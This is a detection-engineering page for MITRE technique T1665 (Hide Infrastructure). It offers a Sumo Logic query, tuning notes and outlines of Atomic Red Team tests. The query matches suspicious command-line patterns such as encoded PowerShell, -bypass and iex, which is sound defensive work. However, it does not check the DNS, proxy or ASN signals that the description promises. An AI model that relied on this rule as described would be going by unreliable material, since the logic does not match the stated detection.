T1665 Sumo Logic CSE · Sumo

Detect Hide Infrastructure in Sumo Logic CSE

This detection identifies adversary attempts to conceal command and control infrastructure through domain masquerading, traffic filtering, and proxy chaining. Specific patterns include processes making DNS queries to domains that impersonate legitimate CDN or cloud providers (typosquatting or lookalike domains), unusual processes initiating connections through multi-hop proxy chains, beaconing to URL shorteners or marketing redirect services, and network connections where resolved IPs do not match the expected ASN for the queried domain. The detection targets techniques used by groups such as APT29 (residential proxy routing), Salt Typhoon (JumbledPath hop chains), and DarkGate (CDN masquerading) to extend the operational lifetime of C2 infrastructure by evading automated takedown and sandbox analysis.

MITRE ATT&CK

Tactic
Command and Control
Technique
T1665 Hide Infrastructure
Canonical reference
https://attack.mitre.org/techniques/T1665/

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql 
_sourceCategory=windows/sysmon EventCode=1
| json auto
| where process_name in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
| where process_cmdline matches /(-enc|-encodedcommand|-bypass|-hidden|invoke-expression|iex\s)/i
    OR process_cmdline matches /(http:\/\/|https:\/\/|ftp:\/\/)/i
| if(process_cmdline matches /-enc/i, "EncodedCommand",
    if(process_cmdline matches /-bypass/i, "BypassExecution",
    if(process_cmdline matches /(invoke-expression|iex)/i, "ScriptExecution",
    "SuspiciousProcess"))) as detection_type
| if(parent_process_name in ("w3wp.exe","httpd.exe","nginx.exe"), 95,
    if(process_cmdline matches /-enc/i, 85,
    if(process_cmdline matches /-bypass/i, 75, 60))) as risk_score
| where risk_score >= 60
| count by host, user, process_name, process_cmdline, parent_process_name, detection_type, risk_score
| sort - risk_score
high severity medium confidence

Sumo Logic detection for Hide Infrastructure (T1665). Identifies adversary hide infrastructure behaviors using Sumo Logic's search pipeline with field extraction and anomaly classification.

Data Sources

Sumo Logic Cloud SIEMWindows Event LogsEndpoint Telemetry

Required Tables

_sourceCategory=windows/sysmon OR _sourceCategory=endpoint/process

False Positives & Tuning

  • Legitimate software updaters or telemetry agents that use CDN-like domain naming conventions for load distribution
  • IT automation scripts (Ansible, Chef, Puppet) that download packages from CDN mirrors with non-standard naming
  • URL shorteners used legitimately by collaboration tools (Slack, Teams bot integrations) where the bot process may be PowerShell-based
Download portable Sigma rule (.yml)

Other platforms for T1665

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1CDN Masquerading DNS Query from PowerShell

    Expected signal: Sysmon Event ID 22 (DNS query) for each domain queried, with Image pointing to powershell.exe and the QueryName field containing each CDN-lookalike domain. Also generates Sysmon Event ID 1 for the PowerShell process creation.

  2. Test 2URL Shortener C2 Redirect Simulation

    Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe (suspicious process chain), Sysmon Event ID 22 for DNS queries to bit.ly and tinyurl.com, Sysmon Event ID 3 for outbound TCP connections to those domains on port 443.

  3. Test 3SOCKS Proxy Tunnel Creation via SSH Dynamic Forwarding

    Expected signal: Sysmon Event ID 1 for ssh.exe with CommandLine containing '-D 1080' dynamic forwarding argument. Sysmon Event ID 3 for attempted TCP connection to localhost:2222. Security Event ID 4688 if process creation auditing is enabled.

  4. Test 4High-Frequency Beacon Simulation from Scripting Engine

    Expected signal: 25 Sysmon Event ID 3 entries for outbound TCP connections from powershell.exe to the same destination IP on port 443, with consistent 2-second intervals visible in event timestamps. Sysmon Event ID 1 for powershell.exe process creation.

Last updated: 2026-03-20 Research depth: deep
References (6)

Unlock Pro Content

Get the full detection package for T1665 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Related Techniques

T1090ProxyT1583Acquire InfrastructureT1584Compromise InfrastructureT1497Virtualization/Sandbox EvasionT1568Dynamic ResolutionT1071Application Layer ProtocolT1573Encrypted ChannelT1205Traffic Signaling

Same Tactic: Command and Control

Popular Detections